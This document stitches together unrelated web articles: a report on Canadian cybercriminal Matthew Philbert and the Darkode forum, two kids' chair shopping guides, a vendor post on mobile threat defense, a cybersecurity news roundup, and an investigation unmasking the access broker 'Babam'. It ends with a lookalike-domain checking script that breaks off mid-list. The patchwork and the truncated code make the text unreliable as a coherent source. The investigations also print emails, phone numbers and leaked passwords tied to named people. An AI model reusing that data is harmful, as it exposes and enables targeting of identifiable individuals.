The U.S. indictment of Philbert (PDF) is unusually sparse, but it does charge him with conspiracy, suggesting the defendant was part of a group. In an interview with KrebsOnSecurity, OPP Detective Inspector Matt Watson declined to say whether other defendants were being sought in connection with the investigation, but said the inquiry is ongoing.

“I will say this, Philbert is the most prolific cybercriminal we’ve identified to date in Canada,” Watson said. “We’ve identified in excess of a thousand of his victims. And a lot of these were small businesses that were just holding on by their fingernails during COVID.”

A DARK CLOUD

There is a now-dormant Myspace account for a Matthew Philbert from Orleans, a suburb of Ottawa, Ontario. The information tied to the Myspace account matches the age and town of the defendant. The Myspace account was registered under the nickname “Darkcloudowner,” and to the email address dark_cl0ud6@hotmail.com.

A search in DomainTools on that email address reveals multiple domains registered to a Matthew Philbert and to the Ottawa phone number 6138999251 [DomainTools is a frequent advertiser on this site]. That same phone number is tied to a Facebook account for a 31-year-old Matthew Philbert from Orleans, who describes himself as a self-employed “broke bitcoin baron.”

Mr. Philbert did not respond to multiple requests for comment.

According to cyber intelligence firm Intel 471, that dark_cl0ud6@hotmail.com address has been used in conjunction with the handle “DCReavers2” to register user accounts on a half-dozen English-language cybercrime forums since 2008, including Hackforums, Blackhatworld, and Ghostmarket.

Perhaps the earliest and most important cybercrime forum DCReavers2 frequented was Darkode, where he was among the first two-dozen members. Darkode was taken down in 2015 as part of an FBI sting operation, but screenshots of the community saved by this author show that DCReavers2 was already well known to the Darkode founders when his membership to the forum was accepted in May 2009.

DCReavers2 was just the 22nd account to register on the Darkode cybercrime forum.

Most of DCReavers2’s posts on Darkode appear to have been removed by forum administrators early on (likely at DCReavers2’s request), but the handful of posts that survived the purge show that more than a decade ago DCReavers2 was involved in running botnets, or large collections of hacked computers.

“My exploit pack is hosted there with 0 problems,” DCReavers2 says of a shady online provider that another member asked about in May 2010.

Searching the Web on “DCreavers2” brings up a fascinating chat conversation allegedly between DCReavers2 and an individual in Australia who was selling access to an “exploit kit,” commercial crimeware designed to be stitched into hacked or malicious sites and exploit a variety of Web-browser vulnerabilities for the purposes of installing malware of the customer’s choosing.

In that 2009 chat, indexed by the researchers behind the website exposedbotnets.com, DCReavers2 uses the Dark_Cl0ud6 email address and actually shares his real name as Matthew Philbert. DCReavers2 also says his partner uses the nickname “The Rogue,” which corresponds to a former Darkode administrator who was the second user ever registered on the forum (see screenshot above).

In that same conversation, DCReavers2 discusses managing a botnet built on ButterFly Bot. Also known as “Mariposa,” ButterFly was a plug-and-play malware strain that allowed even the most novice of would-be cybercriminals to set up a global operation capable of harvesting data from thousands of infected PCs, and using the enslaved systems for crippling attacks on Web sites. The ButterFly Bot kit sold for prices ranging from $500 to $2,000.

An advertisement for the ButterFly Bot.

The author of ButterFly Bot — Slovenian hacker Matjaz “Iserdo” Skorjanc — was Darkode’s original founder back in 2008. Arrested in 2010, Skorjanc was sentenced to nearly five years in prison for selling and supporting Mariposa, which was used to compromise millions of Microsoft Windows computers.

Upon release from prison, Skorjanc became chief technology officer for NiceHash, a cryptocurrency mining service. In December 2017, $52 million worth of Bitcoin mysteriously disappeared from NiceHash coffers. In October 2019, Skorjanc was arrested in Germany in response to a U.S.-issued international arrest warrant for his extradition.

The indictment (PDF) tied to Skorjanc’s 2019 arrest also names several other alleged founding members of Darkode, including Thomas “Fubar” McCormick, a Massachusetts man who was allegedly one of the last administrators of Darkode. Prosecutors say McCormick also was a reseller of the Mariposa botnet, the ZeuS banking trojan, and a bot malware he allegedly helped create called “Ngrbot.” The U.S. federal prosecution against Skorjanc and McCormick is ongoing.

At the time the FBI dismantled Darkode in 2015, the Justice Department said that out of 800 or so crime forums worldwide, Darkode was the most sophisticated English-language forum, and that it represented “one of the gravest threats to the integrity of data on computers in the United States and around the world.”

Some of Darkode’s core members were either customers or sellers of various “locker” kits, which were basically web-based exploits that would lock the victim’s screen into a webpage spoofing the FBI or Justice Department and warning that victims had been caught accessing child sexual abuse material. Victims who agreed to pay a “fine” of several hundred dollars worth of GreenDot prepaid cards could then be rid of the PC locker program.

A 2012 sales thread on Darkode for Rev Locker.

In many ways, lockers were the precursors to the modern cybercrime scourge we now know as ransomware. The main reason lockers never took off as an existential threat to organizations worldwide was that there is only so much money locker users could reasonably demand via GreenDot cards.

But with the ascendance and broader acceptance of virtual currencies like Bitcoin, suddenly criminal hackers could start demanding millions of dollars from victims. And it stands to reason that a great many Darkode members who were never caught have since transitioned from lockers, exploit kits and GreenDot cards to doing what every other self-respecting cybercrook seems to be involved with these days: Locking entire companies and industries for ransomware payments.

One final observation about the Philbert indictment: It’s good to see the Canadian authorities working closely with the FBI on important cybercrime cases. Indeed, this investigation is remarkable for that fact alone. For years I’ve been wondering aloud why more American cybercriminals don’t just move to Canada, because historically there has been almost no probability that they will ever get caught — let alone prosecuted there. With any luck, this case will be the start of something new.

Kids’ rattan chair – stylish and sustainable addition to your interior

Do you fancy beachy, bohemian style? Are you invested in being eco-friendly? If you answered yes, then it’s time to redo your kid’s room and make it look like a little gem. Also, you can make your kid feel even more comfortable in their own room. Even if it’s the baby’s first bedroom, it has to look stylish and cozy at the same time.

So how do you achieve the mission?

First of all, you have to find the perfect kids’ rattan chair for your kid. This piece will instantly bring looks and feelings of the summer season into the room!

Do not be afraid to use bright colors in decorating it. You can paint walls with light blue or pastel green. Then, you just need to add some cute accessories, and you’re done!

Adding a hammock chair to the corner will make the room cozier, and your child can enjoy spending time reading or just taking a nap in it. If there is not enough space for a hammock chair, go for a regular rattan chair.

Rattan furniture is perfect for any kid’s room because it is not only stylish but also eco-friendly. Plus, it is very affordable and easy to clean, which is a bonus!

What is rattan?

Rattan is a natural fiber made from a type of palm tree. It is known for its strength and resistance to wear and tear. Because rattan is a natural fiber, it has been used in Malaysia for over 100 years as traditional furniture.

Rattan is resistant to weather and insects, making it durable for outdoor use. The fibers are woven together to create furniture that is sturdy but also flexible. Rattan can be used without adding harmful chemicals into the environment, making it safe to use in the home.

Rattan chairs are perfect for families that love nature and want their homes to be eco-friendly. It is a versatile material, so if you purchase a rattan chair for your kid, you can also use it for yourself. Why not enjoy some time reading with your child in their new chair?

Where is rattan found?

Rattan can be found in many different countries but is native to Southeast Asia. The rattan palm tree thrives in areas with high humidity and temperatures that don’t fall below 10°C (50°F). As a result, it grows primarily in Indonesia and Malaysia. Other parts of the world, such as Africa, also have rattan trees, but the furniture’s quality is not as good.

How is rattan made?

Rattan is made from the fibers in the rattan palm. The palm tree has large leaves which grow in bunches of six to twelve leaflets, making them look like a feather when they unfurl. The trees can grow 20 meters (65 feet) or more and live for about 25 years.

To make furniture, the bark is removed from the tree and dried in bundles to make rattan strips. These strips can vary in width and length depending on the type of tree and furniture manufacturer. The fibers are soaked in water for 24 to 48 hours before being woven together to create different kinds of furniture, such as chairs, beds, loungers, couches, and tables. One example is rattan chairs, which are often used by kids and adults alike because of their durability and eco-friendly properties.

What is the difference between wicker and rattan?

Wicker is made from the stems of a different type of palm tree, while rattan is made from the fibers in the rattan palm. Rattan is also stronger and more durable than wicker, making it a better choice for furniture. Wicker is often used to make baskets, while rattan can be used to make furniture, flooring, wall paneling, and signs.

Is rattan furniture eco-friendly?

Yes, rattan furniture is eco-friendly. It is made from all-natural materials and does not contain any harmful chemicals. It does not require much energy to produce, allowing manufacturers to create a long-lasting product without harming the environment. The use of rattan furniture can reduce your carbon footprint by saving trees and reducing waste products.

Kids’ rattan chairs – our best picks

Furniture is an essential part of any home, and kids’ furniture is no exception. When it comes to finding the perfect chair for your child, you want something durable, eco-friendly, and stylish. Rattan chairs meet all of these requirements and make a great addition to any kid’s room.

The company called Beachy Mums caught our attention. It has a range of different rattan chairs for kids designed to be both stylish and comfortable. The chairs are made from all-natural materials, making them the perfect choice for kids prone to allergies or asthma.

Here are our top picks for rattan chairs for kids:

Beachy Mums Children’s Handmade Rattan Peacock Chair

This one is a beauty! The rattan material used to make this chair is sourced from Indonesia and crafted by hand. It’s lightweight and easy to move around, making it perfect for any room. It comes with a soft cushion for extra comfort. It is an excellent and stylish choice for kids aged 2-5.

Beachy Mums Rattan Toddler Rainbow Chair

If you’re looking for a rattan chair with a simpler design, this one is a great option. All-natural, sustainable materials are used to produce each one. These beautiful kids’ chairs are handcrafted in Java, Indonesia, and are of excellent quality.

The rainbow pattern makes it a great addition to any children’s space. This chair is ideal for children aged 2 years and older.

Beachy Mums Handmade Vintage Peace Sign Rattan Kid’s Chair

This vintage-style chair is perfect for younger kids. It features a cute peace sign design and is handmade from all-natural materials. The material used is eco-friendly and sustainable, so you know you’re doing the right thing by purchasing it. It is lightweight and easy to move around, making it perfect for any room. This chair is ideal for kids aged 2-5 years old.

Bloomingville Rattan Arm Chair

Time for a chair for both parent and child! This rattan armchair by Danish design company Bloomingville is perfect. It has a simple and stylish design that will complement any home décor. The all-natural rattan material makes it eco-friendly and sustainable. This rattan chair provides a basic yet beautiful bohemian design and a lighthearted atmosphere to the area. It is an excellent piece of Scandinavian design!

Where can I use my rattan furniture?

Rattan furniture is designed to be used on patios and backyards, but it also works inside the home. Rattan chairs add a touch of class to any room, especially if the chairs are used as part of a larger rattan furniture set. Rattan sofas and couches can be used in living rooms, dens, and bedrooms. The material’s natural properties make it easy to blend with any color scheme or theme. Rattan also matches well with wood or other types of furniture.

When should I replace my rattan furniture?

Rattan chairs are designed to last for years, but they can be damaged if left outside through harsh conditions such as rain and snow. To prevent your chair from getting damaged, cover it with a tarp or leave it inside when you’re not using it. If your chair does get damaged, you can usually repair it by using a rattan furniture repair kit.

How do I clean my rattan furniture?

Rattan furniture is easy to clean and does not require any special care. You can simply use a damp cloth to wipe away dirt and dust. If there is a spill, use a dry cloth to blot the liquid and then wipe with a wet cloth. Do not use any type of soap or cleaning agent, as this may damage the furniture. For more thorough cleaning, you can use a vacuum cleaner or soft-bristled brush to remove any dirt or dust that may be trapped in the fibers.

Are there any health risks associated with rattan furniture?

There are no known health risks associated with rattan furniture. The material is made from natural fibers and does not contain harmful chemicals or toxins. Rattan is also resistant to mold and mildew, making it a safe choice for people with allergies or asthma.

Conclusion

Rattan furniture is an excellent choice for any home. It has a simple and stylish design that will complement any décor. The all-natural rattan material is eco-friendly and sustainable, making it a responsible choice for your home. Rattan furniture is both durable and easy to maintain. Rattan chairs are designed for comfort, but the material also gives the room a lighthearted atmosphere.


Mobile Threat Defense | Bringing AI-Powered Endpoint Security To Your Mobile Devices

A Guest Post by Shridhar Mittal, CEO of Zimperium

For the past few decades, corporations have spent considerable time and resources investing in security solutions for traditional endpoints and the infrastructure to which these devices connect. The focus has been on the devices their employees and customers use to connect to their services or workflows.

Modern workflows have evolved and grown, and as a result, new devices have been introduced into the enterprise environment. Many organizations big and small accepted these tablets and phones into their systems in the spirit of productivity, but have dedicated little thought as to how these devices might impact their attack surface.

The Rise of Mobile in the Enterprise

Over the last two years, the modern workforce has changed the face of enterprise security needs, pushing the envelope of technology, access, and capabilities for workers connecting into corporate systems all around the world. Far outside the scope of the physical corporate perimeters and the security within, these new workflows have done more than increase distributed efficiency; they have increased the modern enterprise attack surface to a scale many enterprises were not prepared to handle.

In the context of these last two years and the rapid transformation to work that they represented, mobile devices became utterly critical assets. From replacing the encrypted token keys of the past with two-factor authentication (2FA) apps, to enabling Microsoft Office 365 and other workforce productivity applications for mobile access, the phones and tablets adorning the desks of employees around the world were now part of the core enterprise technology ecosystem in a way they just had not been previously.

These devices are not all corporate-owned either. According to the Verizon Mobile Security Index 2021, 70% of organizations adopted BYOD policies to support the distributed worker. It must be stated explicitly: this means that enterprise data is being accessed, downloaded, and transferred to all of these devices, many of which are personally owned.

And this is not a flash in the pan. The reliance on the mobile endpoint is here to stay. According to the Verizon Mobile Security Index 2021, 71% of enterprises consider mobile to be very critical to business, a trend that rapidly accelerated due to the global pandemic. But with this heavy reliance comes a major shift in the total attack surface for each of these enterprises, and yet far too many still lack even the basic security afforded to more traditional endpoints.

Unprotected Mobiles Increase Your Attack Surface

With this sharp uptick in mobile reliance and usage, attackers have turned their focus to unsecured mobile devices, ripe with corporate system connections, personal and private data, and a low risk of being caught. Many recent headlines demonstrate these attacks are not just small data leaks. Instead, enterprises are faced with zero-day and zero-click vulnerabilities designed to target mobile devices to steal or spy on unsuspecting users. With the average user unaware of the risks to their devices, many of these attacks are more successful than even malicious actors anticipated.

According to Google’s Project Zero, so far in 2021 Android and iOS have accounted for 31% of all zero-day, in-the-wild vulnerabilities used in real attacks against real users (18 out of 58). This is a sharp uptick over 2020, when mobile accounted for only 11% (3 out of 26).

Maddie Stone and Clement Lecigne of Google’s Threat Analysis Group attribute this sharp rise in attacks and the changing attack surface to the reliance on mobile and the growth of mobile throughout the world described above.

“The growth of mobile platforms has resulted in an increase in the number of products that actors want capabilities for.” – Maddie Stone & Clement Lecigne, Google Threat Analysis Group, 2021

When you start thinking about enterprise data and security, the bottom line is mobile endpoints pose a great risk. From BYOD policies to Office 365, compliance mandates like HIPAA, PCI, or NERC, enterprises need to mandate security on all endpoints, including mobile just like traditional endpoints. There is no difference if an employee has data sitting on a laptop or a tablet; it’s one and the same.

From the rise of man-in-the-middle attacks targeting endpoints to misconfigured apps leaking critical information, it’s not just malware that is threatening mobile security. These relied-upon mobile endpoints and the data they are connected to through enterprise apps and services are left at risk due to vulnerable operating systems, malicious and poorly secured apps, and phishing. Rogue and compromised networks, an increasing number of apps with cross-functionality, and even mobile-malware complexity mirroring traditional threats continue to introduce risks to mobile endpoints and apps.

MDM Is No Substitute For Mobile Threat Defense

Over the last few years, many enterprises have turned to mobile device management (MDM) solutions to provide minimal air cover over their iOS and Android devices. When the threat was minimal, these solutions made sense as they could detect changes in the OS or delete corporate data in the event of a lost or stolen device.

But MDMs are not fit to fulfill the security needs of the modern enterprise, lacking the security controls, protections, and capabilities necessary to stand up against advanced threats. MDM solutions are the start of a cohesive mobile security strategy, but MDM cannot be relied upon as the only layer protecting enterprises from the growing mobile threat.

Protect Your Mobile Endpoints with MTD

The modern threat requires a modern security solution to stay ahead of the hacks and malware, minimizing the attack surface. Mobile threat defense (MTD) is enterprise security designed to stay ahead of the attackers, providing the visibility and confidence that IT and security teams need as more mobile endpoints connect into the corporate network.

The security posture of mobile endpoints connected to corporate networks, both managed and unmanaged, needs to be addressed so that none of these devices becomes the starting point for a much larger security incident.

Properly configured and integrated, advanced MTD solutions can enhance existing zero-trust controls by providing mobile device risk attestation. This integration and extended security capabilities are vital to shoring up defenses for enterprises evolving from EPP to XDR security solutions. Advanced MTD solutions provide the features, workflow, and capability that complement XDR capabilities on mobile devices.

IT and security leaders responsible for their enterprise’s mobile endpoint security should be aware that purpose-built mobile security applications are designed to do more than prevent attacks and bring a whole host of other advanced security features to the mobile devices. While legacy mobile security tools do exist, they lack the advanced approach to mobile endpoint security necessary to keep up with modern-day threats.

“MTD products not only prevent attacks but also detect and remediate them. MTD focuses on identifying and thwarting malicious threats, rather than relying on device management configuration to protect against simple user mistakes.

[We] see no value in adopting antivirus solutions that do not provide behavioral anomaly prevention and detection, as the underlying mobile platforms already perform signature-based scans to look for malware.” – Gartner Market Guide for Mobile Threat Defense, March 2021

Integrating Mobile Threat Defense and XDR

With MTD and XDR coming together, organizations are taking a step into the future of complete endpoint security, addressing all the devices from the phone in the pocket to the desktop in the office with advanced security solutions. The alliance between Zimperium and SentinelOne addresses the complete endpoint attack surface, delivering critical security controls to security teams and protection to employees near and far.

By powering the brand new SentinelOne Singularity™ Mobile application added to the lineup, SentinelOne is now providing complete endpoint coverage and protection with the most advanced endpoint security solutions on the market, covering Android, ChromeOS, iOS, macOS, Linux, Windows and Windows Server operating systems, as well as IoT devices and Cloud workloads.

Conclusion

SentinelOne Singularity™ Mobile customers can now manage mobile device security alongside their user workstations, cloud workloads, and IoT devices. Singularity™ Mobile brings behavioral AI-driven protection, detection, and response directly to iOS, Android, and ChromeOS devices. Part of the Singularity Platform, SentinelOne delivers mobile threat defense that is local, adaptive, and real-time, to thwart mobile malware and phishing attacks at the device, with or without a cloud connection.

About Zimperium

Zimperium, the global leader in mobile security, offers the only real-time, on-device, machine learning-based protection against Android, iOS, and Chromebook threats. Powered by z9, Zimperium provides protection against the device, network, phishing, and malicious app attacks.


Kids’ floor chair – a versatile sitting alternative that will leave you floored

Children should be allowed to play and learn in a safe environment. The chairs should be healthy for children to use, and the furniture industry has looked into making chairs especially for kids. The first task was to create a comfortable chair for children of all sizes.

However, not every child likes to sit in a chair. Some of them don’t like it at all! These children would rather sit cross-legged on the floor or lay down and play on a carpet. This is where a new solution was needed.

The function of kids’ floor chair

The task was not easy, and it took a long time before the first children’s floor chairs were ready for sale. In the 70s, several different types of these chairs were designed and made in Denmark, Sweden, and Germany. They have been on sale since the early 1980s under different names.

Many companies have their versions of kids’ floor chairs in modern times, but the primary purpose is still the same – to offer a comfortable and safe place for children to sit and play. The chair can also be used as a place for children to take a nap or rest.

One of the great things about kids’ floor chairs is that they can be used anywhere. They are perfect for use in classrooms, daycares, and homes. They can also double as a temporary bed for little guests.

However, some parents are skeptical of the idea of floor chairs, claiming it’s not a healthy option for children to use because it does not help with posture. But is that the truth?

According to the pediatric physical therapist Jen O’Brien, “There are lots of benefits to using a floor chair rather than a traditional seated chair. First and foremost, it allows kids to move and stretch their bodies throughout the day, crucial for developing strong muscles and bones. Floor chairs also encourage kids to use their imaginations and creativity, as they can use the chairs for all sorts of activities – from reading and coloring to playing pretend games.”

The truth is that kids’ floor chairs are intended to be used temporarily. Children often move around or stand up while using the floor chairs, so it’s not likely for them to develop poor posture.

So, it would seem that the benefits of kids’ floor chairs outweigh any negatives. They are safe, comfortable and promote creativity and movement, all essential for healthy development. If you are looking for an alternative to traditional seating options for your child, a floor chair is a great option to consider.

What are the best kids’ floor chairs?

Parents are searching for the best kids’ furniture to make their children happy! As for choosing, there are many styles and brands of floor chairs on the market. However, our article will focus only on the best kids’ floor chairs that you can easily find online. The common thing is that they are safe, comfortable to sit on, durable, easy to use, and versatile!

Crestlive Products Floor Chair

This floor chair is available in two colors (blue and grey) and has five adjustable positions. This will help the child to use it for a more extended time. This floor chair features a flexible design that lets you lay the chair flat to sleep, lounge, watch your favorite movie, or play board games at 90°.

The Crestlive Products’ Floor Chair is designed with a breathable cotton fabric cover for a pleasant seat on any surface. The ergonomic design, which is highly resilient, adapts to your child’s physique for a comfortable chair.

This floor chair is convenient too: it can be easily stored under a bed or tall couch. The floor chair cover is removable for washing. The unique reverse zipper on the cover prevents the floor from being scratched. Also, your child can store various items while reading or playing board games thanks to the back pocket.

Bonvivo Easy II Folding Floor Chair

This floor chair is perfect for children and adults who need a temporary seat. The Bonvivo Easy II Folding Floor Chair is ideal for use at home, office, or special events.

The chair can be folded for easy storage, perfect for small spaces. It is also lightweight, making it easy to transport. The chair is made of high-quality materials, making it durable and long-lasting. The fabric is also breathable, ensuring that the child remains comfortable while sitting.

The Bonvivo Easy II Folding Floor Chair is a perfect option for any parent or caretaker who wants to ensure that their child is happy and comfortable while seated.

OTTERLEAd Super Soft Floor Chair

OTTERLEAd Super Soft Floor Chair is comfy like no other – designed with high-density memory foam and soft plush fabric; thickened flannelette cushions will make you feel comfortable when sitting on the floor.

Both kids and adults will enjoy sitting on the floor with this comfy seat. It is perfect for reading, studying, watching TV and more!

The chair is portable and lightweight, making it easy to carry and move around everywhere. The OTTERLEAd Super Soft Floor Chair is a perfect choice for anyone who wants a comfortable and versatile floor chair.

FLOGUOR Foldable Floor Chair with Armrests and Pillow

The most expensive on the list and the most original of the bunch! The FLOGUOR Foldable Floor Chair with Armrests and Pillow is perfect for both kids and adults. The chair is made of high-quality materials, making it durable and long-lasting.

What’s so special about this floor chair is that it combines a soft pillowy design with the features of a traditional chair. It has an ergonomic design for comfort and support, which is perfect for kids. The chair features armrests for added relaxation, making it equally suitable for adults. FLOGUOR Foldable Floor Chair functions as 4 different products: a chair, a sofa, a recliner, and a bed.

Malu Luxury Padded Floor Chair with Back Support

The Luxury Padded Floor Chair by Malu is a super-comfortable foam-padded chair with an adjustable backrest that can be set to five distinct positions.

The Malu Chair is ideal for children and adults of all ages. It’s perfect for playing video games or even working from home! It’s a fantastic addition to your home, especially since it can serve as an extra seat or bed while having visitors.

Malu’s floor chair is also suitable to use outdoors. It is a great way to enjoy activities like sports events, relaxing or meditating in the park, camping, or just hanging out at the beach! The Malu floor chair even features an adjustable strap to make it convenient to transport.

The vegan leather on Malu Chair is perfect for blending in with any décor style. It’s effortless to keep clean and looks great with every aesthetic. Just remove the cover and wash it in the washing machine!

FLOGUOR Indoor 5-Position Adjustable Floor Chair with Back Support

The FLOGUOR Indoor 5-Position Adjustable Floor Chair with Back Support is a resilient chair designed for superior comfort. Constructed with high-quality materials, this floor chair guarantees a long life of perfect use!

With its ergonomic design and adjustable back support, the FLOGUOR Indoor 5-Position Adjustable Floor Chair is perfect for people of all ages. It is an excellent addition to playrooms, bedrooms, or even conference rooms!

The chair is also lightweight and portable, making it easy to move around. The FLOGUOR Indoor 5-Position Adjustable Floor Chair is a perfect choice for anyone who wants a comfortable and versatile floor chair at a reasonable price.

LAYBACK Floor Chair with Back Support

With a LAYBACK floor chair, you can just… lay back and enjoy! Relax and unwind as you watch, chat, play video games, or read a thrilling novel in this exquisite recliner.

This floor chair is adjustable and includes five reclining positions, so it’s suitable for a wide range of people and styles. You can sit just as you like it! The LAYBACK chair is made of high-quality materials, making it a durable and reliable choice for years to come. It is the floor chair option you don’t want to miss out on!

What is better for kids: sitting in a chair or on the floor?

There is no easy answer to this question, as it depends on the individual child. Some children feel more comfortable sitting in a chair, while others prefer to sit on the floor.

One of the benefits of using a floor chair is that it encourages kids to move around and stretch their bodies throughout the day. This is important for developing strong muscles and bones. Floor chairs also help kids use their imaginations and creativity, as they can use the chairs for all sorts of activities.

Another benefit of floor chairs is that they are often well-padded and comfortable. This makes them great for young children to use, as the padding helps to relieve pressure points when sitting down. It also reduces friction between the skin and fabric or wood material, which can lead to rashes.

In comparison, traditional chairs have been designed primarily for adults, so it’s no surprise that they are not always comfortable for children. They often do not have the proper padding, and they can be pretty stiff and uncomfortable.

Kids’ floor chairs are an excellent way for children to have a comfortable place to sit and play without having to use a regular chair. They offer a safe and healthy alternative for children who don’t like to sit in chairs, and they can be used for temporary seating and napping.

Besides being safe and comfortable, a floor chair needs to be durable and easy to use. It should also be possible to move the chairs around on the floor or stack them up for storage.

In conclusion, it is up to the individual child to decide which option is better for them. Floor chairs offer several benefits over traditional chairs, including improved physical and mental development. But in the end, it is just a simple matter of personal preference.

The post Kids’ floor chair – a versatile sitting alternative that will leave you floored appeared first on Comfy Bummy.

The Good, the Bad and the Ugly in Cybersecurity – Week 49

The Good

It’s been a great week for law enforcement. Just after we went to press last week, Interpol announced the arrest of over 1000 cyber criminals in an operation codenamed HAECHI-II (In Korea, Haechi is a popular mythical animal widely used as a symbol of justice).

In raw arrests, that’s twice as successful as its predecessor, HAECHI-I earlier this year, which itself resulted in the arrest of 500 cyber fraudsters. The latest operation took place in twenty countries and intercepted $27m of illicit funds. Cyber cops also froze 2,350 bank accounts connected to various forms of online crime, including money laundering, investment fraud and romance scams.

Meanwhile, there have been welcome developments in a case we reported on back in October involving bulletproof hosting services aiding and abetting cybercrime. Prosecutors have now sentenced the third of four men indicted under RICO charges.

Aleksandr Grichishkin received a 5-year prison term for his role as a “founder and leader” of a gang that rented out IP addresses, servers and internet domains to spread malware such as Zeus, SpyEye, Citadel and the Blackhole Exploit Kit. Grichishkin’s sentence follows two- and four-year terms handed down to his co-conspirators. A fourth individual, Andrei Skvortsov, is yet to be sentenced. He faces a maximum penalty of 20 years.

The Bad

“Watch out for the quiet ones at the back” is a good adage in security in general, and when it comes to cybersecurity in particular, this means unnoticed devices like printers and IoT machines that can sit on our networks relatively forgotten in terms of endpoint protection.

This week, HP printers came to the forefront again as researchers disclosed details of flaws that could be used by attackers in remote as well as physical attacks. In one scenario, a user could be socially engineered to print out a malicious PDF containing an exploit for a font-parsing vulnerability. Just printing the document can give an attacker code execution rights, allowing data theft or lateral movement across the network.

On top of that, one of the vulnerabilities found is wormable, meaning that compromising one printer on the network could lead to the compromise of any other connected devices that are vulnerable to the same bugs. Researchers say around 150 models of multi-function printers (MFPs) are affected. The flaws, tracked as CVE-2021-39237 and CVE-2021-39238, were patched last month by HP.

The disclosure follows SentinelLabs’ discovery in July of high severity flaws in HP, Samsung and Xerox printer drivers affecting millions of printers worldwide and which could allow unprivileged users to run code in kernel mode.

While exploitation of such flaws is by no means “low-hanging fruit”, the fact that network printers are often forgotten, unpatched and unprotected means they could present an attractive target for attackers. Ensuring you have visibility into everything connected to your network, particularly IoT devices like printers, is a must.

The Ugly

As the world continues to wrestle with the ongoing COVID-19 pandemic, threat actors have lost no time exploiting fears around the new Omicron variant in phishing lures.

This week’s egregious example involves an email scam purporting to come from the UK’s National Health Service offering recipients a free Omicron PCR test.

The email, which comes from a scam email address (contact-nhs@nhscontact.com), contains a “Get it now” button with a link to a fake NHS website. According to UK consumer watchdog Which?, the site directs users to enter personal details including full name, date of birth, address and phone number.

The email also contains plenty of the usual scare tactics to encourage people to click through to the malicious website. “What happens if you decline a COVID-19 Omicron test?”, the email asks, and goes on to state that “…we warned that testing is in the best interests of themselves, friends, and family. People who do not consent…must be isolated”.

The fake NHS website looks convincing and includes reassurances about “protecting the privacy” of personal information.

The “free” offer turns out to require victims to pay £1.24 for delivery of the phony test. The small amount of the charge serves both to add authenticity and to disguise the scammers’ real intent: gathering the payment details of the victims for account takeover, fraud, and identity theft.

Anyone who suspects they may have fallen victim to the scam is advised to contact their bank immediately, cancel any cards used in the transaction, and change account passwords. The Which? consumer service also provides help on how to retrieve money lost in a scam.

Who Is the Network Access Broker ‘Babam’?

Rarely do cybercriminal gangs that deploy ransomware gain the initial access to the target themselves. More commonly, that access is purchased from a cybercriminal broker who specializes in acquiring remote access credentials — such as usernames and passwords needed to remotely connect to the target’s network. In this post we’ll look at the clues left behind by “Babam,” the handle chosen by a cybercriminal who has sold such access to ransomware groups on many occasions over the past few years.

Since the beginning of 2020, Babam has set up numerous auctions on the Russian-language cybercrime forum Exploit, mainly selling virtual private networking (VPN) credentials stolen from various companies. Babam has authored more than 270 posts since joining Exploit in 2015, including dozens of sales threads. However, none of Babam’s posts on Exploit include any personal information or clues about his identity.

But in February 2016, Babam joined Verified, another Russian-language crime forum. Verified was hacked at least twice in the past five years, and its user database posted online. That information shows that Babam joined Verified using the email address “operns@gmail.com.” The latest Verified leak also exposed private messages exchanged by forum members, including more than 800 private messages that Babam sent or received on the forum over the years.

In early 2017, Babam confided to another Verified user via private message that he is from Lithuania. In virtually all of his forum posts and private messages, Babam can be seen communicating in transliterated Russian rather than by using the Cyrillic alphabet. This is common among cybercriminal actors for whom Russian is not their native tongue.

Cyber intelligence platform Constella Intelligence told KrebsOnSecurity that the operns@gmail.com address was used in 2016 to register an account at filmai.in, which is a movie streaming service catering to Lithuanian speakers. The username associated with that account was “bo3dom.”

A reverse WHOIS search via DomainTools.com says operns@gmail.com was used to register two domain names: bonnjoeder[.]com back in 2011, and sanjulianhotels[.]com (2017). It’s unclear whether these domains ever were online, but the street address on both records was “24 Brondeg St.” in the United Kingdom. [Full disclosure: DomainTools is a frequent advertiser on this website.]

A reverse search at DomainTools on “24 Brondeg St.” reveals one other domain: wwwecardone[.]com. The use of domains that begin with “www” is fairly common among phishers, and by passive “typosquatting” sites that seek to siphon credentials from legitimate websites when people mistype a domain, such as accidentally omitting the “.” after typing “www”.

A banner from the homepage of the Russian language cybercrime forum Verified.

Searching DomainTools for the phone number in the WHOIS records for wwwecardone[.]com  — +44.0774829141 — leads to a handful of similar typosquatting domains, including wwwebuygold[.]com and wwwpexpay[.]com. A different UK phone number in a more recent record for the wwwebuygold[.]com domain — 44.0472882112 — is tied to two more domains – howtounlockiphonefree[.]com, and portalsagepay[.]com. All of these domains date back to between 2012 and 2013.

The original registration records for the iPhone, Sagepay and Gold domains share an email address: devrian26@gmail.com. A search on the username “bo3dom” using Constella’s service reveals an account at ipmart-forum.com, a now-defunct forum concerned with IT products, such as mobile devices, computers and online gaming. That search shows the user bo3dom registered at ipmart-forum.com with the email address devrian27@gmail.com, and from an Internet address in Vilnius, Lithuania.

Devrian27@gmail.com was used to register multiple domains, including wwwsuperchange.ru back in 2008 (notice again the suspect “www” as part of the domain name). Gmail’s password recovery function says the backup email address for devrian27@gmail.com is bo3*******@gmail.com. Gmail accepts the address bo3domster@gmail.com as the recovery email for that devrian27 account.

According to Constella, the bo3domster@gmail.com address was exposed in multiple data breaches over the years, and in each case it used one of two passwords: “lebeda1” and “a123456”.

Searching in Constella for accounts using those passwords reveals a slew of additional “bo3dom” email addresses, including bo3dom@gmail.com. Pivoting on that address in Constella reveals that someone with the name Vytautas Mockus used it to register an account at mindjolt.com, a site featuring dozens of simple puzzle games that visitors can play online.

At some point, mindjolt.com apparently also was hacked, because a copy of its database at Constella says the bo3dom@gmail.com address used two passwords at that site: lebeda1 and a123456.

A reverse WHOIS search on “Vytautas Mockus” at DomainTools shows the email address devrian25@gmail.com was used in 2010 to register the domain name perfectmoney[.]co. This is one character off of perfectmoney[.]com, which is an early virtual currency that was quite popular with cybercriminals at the time. The phone number tied to that domain registration was “86.7273687”.
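A defender-side check for the two lookalike patterns described above (a “www” fused onto a name, and a domain one character off a real one), added here as an example that is not part of the original article. The watchlist, the sample list and all function names are assumptions; inputs are assumed to be registrable domains, optionally prefixed with “www.”.

```python
"""Flag lookalike domains of the two kinds named in the article (added example)."""

# Assumed watchlist of legitimate domains a defender wants to protect.
# perfectmoney.com is named in the article; ecardone.com is an assumption
# obtained by removing the fused "www" from wwwecardone[.]com.
PROTECTED = ["ecardone.com", "perfectmoney.com"]

# Domains quoted in the article, kept defanged as printed there.
SAMPLE = ["wwwecardone[.]com", "wwwebuygold[.]com", "wwwpexpay[.]com",
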